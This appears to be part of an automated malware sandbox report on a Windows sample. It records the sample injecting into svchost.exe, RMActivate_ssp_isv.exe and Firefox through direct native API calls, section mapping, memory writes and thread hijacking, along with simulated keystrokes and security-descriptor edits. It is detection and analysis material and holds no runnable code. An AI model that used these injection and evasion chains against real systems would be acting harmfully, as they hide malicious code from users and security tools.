                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037EA49A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03728B50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804B00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03752835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe, Code function: 0_2_004880A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe, Code function: 0_2_0045A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exe, Code function: 0_2_0045A124 SetUnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtResumeThread: Direct from: 0x773836AC
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtMapViewOfSection: Direct from: 0x77382D1C
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtWriteVirtualMemory: Direct from: 0x77382E3C
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtProtectVirtualMemory: Direct from: 0x77382F9C
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtSetInformationThread: Direct from: 0x773763F9
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtCreateMutant: Direct from: 0x773835CC
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtNotifyChangeKey: Direct from: 0x77383C2C
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtSetInformationProcess: Direct from: 0x77382C5C
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtCreateUserProcess: Direct from: 0x7738371C
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtQueryInformationProcess: Direct from: 0x77382C26
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtResumeThread: Direct from: 0x77382FBC
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtWriteVirtualMemory: Direct from: 0x7738490C
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtAllocateVirtualMemory: Direct from: 0x77383C9C
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtReadFile: Direct from: 0x77382ADC
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtAllocateVirtualMemory: Direct from: 0x77382BFC
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtDelayExecution: Direct from: 0x77382DDC
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtQuerySystemInformation: Direct from: 0x77382DFC
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtOpenSection: Direct from: 0x77382E0C
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtQuerySystemInformation: Direct from: 0x773848CC
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtCreateKey: Direct from: 0x77382C6C
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtReadVirtualMemory: Direct from: 0x77382E8C
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtAllocateVirtualMemory: Direct from: 0x773848EC
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtQueryAttributesFile: Direct from: 0x77382E6C
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtSetInformationThread: Direct from: 0x77382B4C
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtTerminateThread: Direct from: 0x77382FCC
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtQueryInformationToken: Direct from: 0x77382CAC
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtOpenKeyEx: Direct from: 0x77382B9C
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe, NtAllocateVirtualMemory: Direct from: 0x77382BEC
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: NULL target: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: NULL target: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeThread register set: target process: 2276Jump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: AC5008Jump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004887B1 LogonUserW,0_2_004887B1
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00433B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00433B3A
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004348D7
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00494C53 mouse_event,0_2_00494C53
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BLv4mI7zzY.exe"Jump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe "C:\Windows\SysWOW64\RMActivate_ssp_isv.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00487CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00487CAF
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0048874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0048874B
